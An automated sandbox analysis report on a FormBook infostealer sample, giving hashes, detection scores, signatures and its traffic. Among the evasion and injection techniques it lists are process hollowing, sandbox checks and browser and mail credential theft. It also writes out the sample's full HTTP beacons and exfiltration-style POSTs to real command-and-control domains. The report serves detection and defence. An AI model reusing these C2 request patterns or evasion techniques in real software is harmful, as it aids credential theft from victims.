Analysis Report mp0nMsMroT.exe

Overview

General Information

Sample Name: mp0nMsMroT.exe
Analysis ID: 286180
MD5: 26a5cbbf551c2a810792aad03ed4d51b
SHA1: b509a59df8bcbb441cb8f527c920a37e49521098
SHA256: af164cd974521a1577be7c68ed0babe78e59f94ae13f79777f8565cef148c09f

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: mp0nMsMroT.exe Virustotal: Detection: 47%
Source: mp0nMsMroT.exe ReversingLabs: Detection: 79%
Yara detected FormBook
Source: Yara match File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: mp0nMsMroT.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00408454 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408454
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00405098 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405098
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D7F470 FindFirstFileW,FindNextFileW,FindClose, 5_2_02D7F470

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 4x nop then pop edi 1_2_00415023
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 4x nop then pop edi 1_2_0040C12E
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 4x nop then pop esi 1_2_004151C5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 4x nop then pop ebx 1_2_004066D4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 5_2_02D85023
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop esi 5_2_02D851C5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 5_2_02D7C12E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 5_2_02D766D7

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49726
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49732
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49738
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.98.99.30:80 -> 192.168.2.5:49744
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49750
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49752
Uses netstat to query active network connections and open ports
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1 Host: www.smileyefero.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1 Host: www.cxyl968.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1 Host: www.bestselfietools.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1 Host: www.homecaredispatch.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1 Host: www.netrworksoultions.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1 Host: www.splishysplashie.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1 Host: www.ugpounds.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1 Host: www.kuralike.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1 Host: www.cdershoushichang.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1 Host: www.cakoi.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1 Host: www.davabeauty.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1 Host: www.icfc-lr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.196.13.28
Source: Joe Sandbox View IP Address: 64.98.145.30
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-AESUS
Source: Joe Sandbox View ASN Name: TUCOWS-3CA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.bestselfietools.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.bestselfietools.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bestselfietools.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 41 73 59 74 6c 2d 66 2d 77 4b 55 42 4a 4b 33 49 30 72 51 6a 30 57 75 48 41 55 44 72 71 53 75 31 6e 43 28 46 69 77 49 50 47 76 72 4d 6d 6e 4c 76 58 4b 71 5a 69 35 28 57 42 75 77 2d 6c 76 78 63 68 75 49 32 59 42 63 68 30 43 52 45 39 45 34 70 47 36 75 6a 51 31 6a 49 67 7a 4f 7a 64 65 52 6b 30 44 56 6a 74 4a 48 36 33 2d 6f 74 45 31 34 4b 6f 73 34 5f 70 30 73 48 57 49 7a 49 6d 61 75 4f 55 54 62 6b 31 4f 6a 43 6a 58 78 6e 6c 76 69 4c 69 44 71 4d 7e 7a 64 4c 28 4a 44 79 64 72 51 4f 72 55 38 50 62 36 74 53 31 41 78 59 53 79 78 34 50 48 37 47 7a 41 6e 68 78 67 63 51 32 57 6f 64 6f 75 37 7a 35 45 36 70 33 52 28 6f 79 36 67 65 49 64 50 2d 46 69 62 4d 51 30 6e 30 63 77 34 65 5a 46 50 63 4c 4e 45 58 69 6c 67 42 73 71 4f 71 34 36 30 6c 59 39 72 36 6c 5a 6b 73 45 50 50 63 6a 31 37 43 4e 6f 70 39 4f 45 55 72 39 71 48 42 35 32 74 68 45 36 75 38 45 65 5a 61 63 30 69 6d 46 35 43 46 49 69 59 79 6d 50 69 64 37 59 43 7a 66 6c 78 4e 75 46 33 68 78 44 68 54 33 73 4f 42 6e 4e 61 44 41 43 71 37 4f 48 39 36 4c 77 62 53 35 66 74 55 6c 69 71 63 51 59 50 32 6f 42 28 76 72 79 77 74 48 44 36 45 63 6d 4c 7a 6d 79 6f 6b 42 57 75 79 46 37 61 73 6e 45 39 5f 5a 6d 7e 62 4f 57 5a 67 35 45 4f 75 6f 62 5a 55 30 44 31 52 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=AsYtl-f-wKUBJK3I0rQj0WuHAUDrqSu1nC(FiwIPGvrMmnLvXKqZi5(WBuw-lvxchuI2YBch0CRE9E4pG6ujQ1jIgzOzdeRk0DVjtJH63-otE14Kos4_p0sHWIzImauOUTbk1OjCjXxnlviLiDqM~zdL(JDydrQOrU8Pb6tS1AxYSyx4PH7GzAnhxgcQ2Wodou7z5E6p3R(oy6geIdP-FibMQ0n0cw4eZFPcLNEXilgBsqOq460lY9r6lZksEPPcj17CNop9OEUr9qHB52thE6u8EeZac0imF5CFIiYymPid7YCzflxNuF3hxDhT3sOBnNaDACq7OH96LwbS5ftUliqcQYP2oB(vrywtHD6EcmLzmyokBWuyF7asnE9_Zm~bOWZg5EOuobZU0D1RgQ).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.homecaredispatch.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.homecaredispatch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.homecaredispatch.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 37 46 6c 6e 35 2d 47 4c 4d 4d 47 46 7e 67 33 5a 41 69 77 33 39 2d 4c 63 4d 5a 55 58 68 33 42 69 39 6d 61 79 63 74 52 6f 56 4d 49 72 52 4c 77 6a 6f 44 76 48 6d 34 36 39 59 44 7a 4f 30 4a 36 41 49 49 35 72 6b 4d 32 69 46 45 52 52 65 6e 77 39 78 74 56 49 44 54 41 6d 30 4d 78 47 77 4b 6e 48 58 6d 55 4d 72 75 4f 6a 30 41 34 33 35 57 72 63 6c 30 46 49 49 39 30 4a 45 59 34 75 4a 53 69 67 39 57 6e 42 33 50 77 46 32 79 6c 58 51 4a 4c 62 65 77 49 32 33 33 51 59 4b 65 4f 6c 7a 36 7e 31 4c 78 38 56 6a 6a 30 43 78 72 6b 5f 42 36 30 56 6f 64 68 5f 56 52 71 39 6b 73 54 49 64 4a 74 65 6b 4f 7a 34 70 46 68 73 77 33 53 52 75 69 6a 79 28 67 36 72 6f 36 69 4a 7a 45 31 78 77 6a 67 63 4b 71 79 6c 6d 41 38 6e 36 56 78 65 6e 64 7e 4b 71 51 61 39 43 61 38 6d 77 30 49 55 55 39 51 43 6c 59 51 50 62 5f 62 51 34 36 71 54 4b 46 48 75 54 73 71 5f 31 6a 53 67 4b 42 71 49 59 57 42 64 71 34 58 54 31 70 58 4a 44 77 32 55 31 43 52 6c 47 32 51 30 59 6b 43 43 4e 2d 58 77 50 76 54 6d 78 6b 35 64 4e 63 79 5a 28 6a 4f 68 52 4b 4d 58 7e 4a 41 76 73 49 72 36 59 74 49 5a 6f 2d 63 71 7e 76 36 42 6a 43 45 74 69 73 44 71 6f 5a 49 67 77 72 43 6d 4c 51 5a 4d 7e 6f 72 63 4e 42 6d 6c 7e 2d 54 62 72 54 67 44 6b 2d 74 35 57 69 78 43 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=7Fln5-GLMMGF~g3ZAiw39-LcMZUXh3Bi9mayctRoVMIrRLwjoDvHm469YDzO0J6AII5rkM2iFERRenw9xtVIDTAm0MxGwKnHXmUMruOj0A435Wrcl0FII90JEY4uJSig9WnB3PwF2ylXQJLbewI233QYKeOlz6~1Lx8Vjj0Cxrk_B60Vodh_VRq9ksTIdJtekOz4pFhsw3SRuijy(g6ro6iJzE1xwjgcKqylmA8n6Vxend~KqQa9Ca8mw0IUU9QClYQPb_bQ46qTKFHuTsq_1jSgKBqIYWBdq4XT1pXJDw2U1CRlG2Q0YkCCN-XwPvTmxk5dNcyZ(jOhRKMX~JAvsIr6YtIZo-cq~v6BjCEtisDqoZIgwrCmLQZM~orcNBml~-TbrTgDk-t5WixCmQ).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.netrworksoultions.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.netrworksoultions.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.netrworksoultions.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 79 4e 6f 53 68 67 6a 6f 69 77 55 4a 44 36 31 6b 55 79 5f 39 74 37 67 62 77 55 4e 37 36 74 62 45 6b 71 78 70 4d 7e 53 68 32 47 67 6a 34 67 66 55 4e 44 49 72 48 77 64 67 71 66 4c 71 2d 31 62 4a 30 68 36 56 76 50 51 59 44 38 48 42 32 6f 51 41 52 74 58 67 48 43 4a 54 71 75 68 71 35 7a 4f 4e 42 59 54 76 50 75 35 74 4f 58 54 6c 35 65 35 33 44 58 62 65 58 30 51 79 4f 55 49 4e 6e 6a 39 28 53 73 4c 70 59 35 56 74 67 6d 4a 79 4f 51 75 70 6a 6c 5a 65 37 6e 47 49 37 63 41 61 55 6a 5f 28 4d 49 75 41 44 4e 6d 6e 47 4f 6c 4e 61 64 77 6c 55 6e 36 7e 7a 28 2d 38 46 67 65 61 78 72 75 52 72 4a 6f 48 39 65 6f 47 44 61 55 6f 75 38 64 72 6b 73 42 51 4f 4b 6c 6c 50 30 32 4b 35 6e 6f 78 72 65 4a 73 6a 6f 50 64 42 68 75 47 5f 6f 50 30 42 69 46 4b 78 4d 31 74 36 7e 50 45 6c 35 44 35 50 53 44 39 52 75 55 56 6c 51 33 35 57 6e 4b 74 2d 31 57 74 58 65 6f 58 59 6b 7a 39 47 79 44 34 2d 41 53 43 61 44 5f 35 35 79 76 42 6c 37 79 74 59 39 47 7e 2d 5a 4f 4e 76 61 50 4e 74 77 74 47 2d 63 6d 6d 30 6a 37 7a 72 35 76 7e 39 6d 4f 36 4b 6a 69 39 37 4d 77 4e 49 64 72 65 51 35 64 66 41 59 74 50 67 63 4c 57 61 7e 66 43 6d 4b 77 65 63 28 31 62 6f 6f 68 56 5a 66 47 6b 51 70 71 64 52 55 57 30 58 64 4c 51 39 54 36 66 57 51 55 55 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=WyNoShgjoiwUJD61kUy_9t7gbwUN76tbEkqxpM~Sh2Ggj4gfUNDIrHwdgqfLq-1bJ0h6VvPQYD8HB2oQARtXgHCJTquhq5zONBYTvPu5tOXTl5e53DXbeX0QyOUINnj9(SsLpY5VtgmJyOQupjlZe7nGI7cAaUj_(MIuADNmnGOlNadwlUn6~z(-8FgeaxruRrJoH9eoGDaUou8drksBQOKllP02K5noxreJsjoPdBhuG_oP0BiFKxM1t6~PEl5D5PSD9RuUVlQ35WnKt-1WtXeoXYkz9GyD4-ASCaD_55yvBl7ytY9G~-ZONvaPNtwtG-cmm0j7zr5v~9mO6Kji97MwNIdreQ5dfAYtPgcLWa~fCmKwec(1boohVZfGkQpqdRUW0XdLQ9T6fWQUUw).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.splishysplashie.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.splishysplashie.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.splishysplashie.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 58 55 70 30 38 52 58 57 41 73 49 51 4c 4d 65 6b 49 41 70 69 46 49 55 43 77 6d 6c 52 57 35 76 74 78 57 5a 4c 52 43 58 37 77 68 41 32 74 67 4e 49 4b 70 4e 6f 4b 43 48 6f 56 4d 55 62 56 43 32 33 28 59 71 75 73 68 37 6d 45 4e 7e 4f 41 50 48 4e 45 43 68 34 52 75 79 53 44 54 4e 54 36 78 79 33 38 54 59 74 61 5a 53 44 52 66 44 68 32 78 54 52 66 55 57 64 64 4a 66 36 5a 55 34 6e 65 70 59 69 52 69 42 79 39 59 28 39 77 6a 28 73 77 58 4d 6d 5a 2d 62 63 32 64 6c 4f 42 6a 79 36 74 44 6e 42 54 77 39 6e 78 67 48 54 37 71 57 4f 48 59 30 5f 59 6f 7e 35 6e 37 6c 72 51 6f 50 43 67 62 33 46 67 53 69 63 32 35 4c 75 44 41 74 51 34 6d 36 59 36 63 6a 47 73 73 6a 4c 71 5a 72 7a 7a 67 31 58 4a 53 61 7a 78 4f 69 55 34 37 44 4c 5a 6f 66 64 6a 79 58 38 42 41 75 6d 71 43 43 78 6e 43 68 43 68 42 67 68 5a 68 45 65 36 58 33 74 43 35 52 50 74 45 43 37 54 62 51 79 6c 7a 73 37 70 54 7e 66 55 46 38 31 77 6d 74 52 28 43 70 69 73 2d 35 77 74 41 4d 32 45 77 6b 70 6f 4c 34 2d 49 53 34 55 43 39 79 56 58 6c 31 77 79 49 6c 5a 41 43 70 50 54 35 4b 47 47 62 79 55 74 46 79 31 4c 4b 6f 78 68 69 46 51 4c 58 57 4f 4f 46 4c 6b 47 53 71 63 64 5a 70 46 48 5a 36 4a 4d 4c 7e 6a 36 69 33 66 66 5f 48 68 43 78 34 71 5a 4b 6a 58 34 41 5a 62 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=XUp08RXWAsIQLMekIApiFIUCwmlRW5vtxWZLRCX7whA2tgNIKpNoKCHoVMUbVC23(Yqush7mEN~OAPHNECh4RuySDTNT6xy38TYtaZSDRfDh2xTRfUWddJf6ZU4nepYiRiBy9Y(9wj(swXMmZ-bc2dlOBjy6tDnBTw9nxgHT7qWOHY0_Yo~5n7lrQoPCgb3FgSic25LuDAtQ4m6Y6cjGssjLqZrzzg1XJSazxOiU47DLZofdjyX8BAumqCCxnChChBghZhEe6X3tC5RPtEC7TbQylzs7pT~fUF81wmtR(Cpis-5wtAM2EwkpoL4-IS4UC9yVXl1wyIlZACpPT5KGGbyUtFy1LKoxhiFQLXWOOFLkGSqcdZpFHZ6JML~j6i3ff_HhCx4qZKjX4AZbCA).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.ugpounds.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.ugpounds.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ugpounds.info/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6a 78 59 68 5a 6e 34 33 31 72 6e 70 52 2d 42 49 39 56 34 44 57 35 64 51 6c 4e 4a 65 35 38 6c 34 6d 67 7e 64 33 77 4d 41 70 49 61 76 72 35 61 45 79 57 4c 30 6a 43 30 4e 49 45 56 72 6e 77 56 75 79 65 34 35 6e 6d 66 33 43 74 62 54 45 75 62 68 77 59 53 46 33 7a 52 37 6e 78 50 69 31 52 68 54 30 69 66 6c 48 45 4a 79 51 6b 46 32 38 77 4d 6c 77 53 4d 74 31 41 41 77 32 74 76 37 42 72 36 71 68 50 44 70 51 2d 45 35 38 52 32 4c 74 31 7e 7a 54 33 65 66 44 42 78 65 4f 43 63 30 72 5f 78 30 59 47 7e 51 6a 33 72 76 79 4c 48 39 55 33 66 50 6e 5f 59 6f 65 48 7a 4e 77 31 39 35 50 38 51 45 6c 65 69 6d 77 6d 49 51 6a 58 46 57 30 5a 44 44 4c 4d 6f 78 67 38 34 61 28 57 7a 39 7a 66 46 6b 67 4c 66 2d 41 64 37 56 74 43 6d 39 6a 5f 72 7a 4c 35 6f 6d 79 49 76 36 65 47 39 55 54 50 66 58 70 4d 4d 59 35 59 45 56 51 76 7a 4a 4c 39 64 50 6c 57 73 4f 28 74 6e 54 36 46 63 32 30 51 69 4f 28 5a 34 70 6a 5a 68 67 62 46 37 5a 6f 55 47 32 4a 78 52 39 56 6f 43 74 69 39 4b 53 42 6a 65 38 4d 67 4b 46 53 4d 65 78 42 37 42 67 4f 54 71 61 48 73 30 4b 4e 35 4b 43 65 4e 41 64 46 65 31 59 55 6c 6a 33 4d 73 56 31 73 6a 30 38 4a 4b 61 2d 4f 2d 31 54 65 74 38 6f 44 4b 78 49 70 2d 68 6f 51 4d 39 75 30 45 45 78 4d 4f 28 38 56 69 63 75 6a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
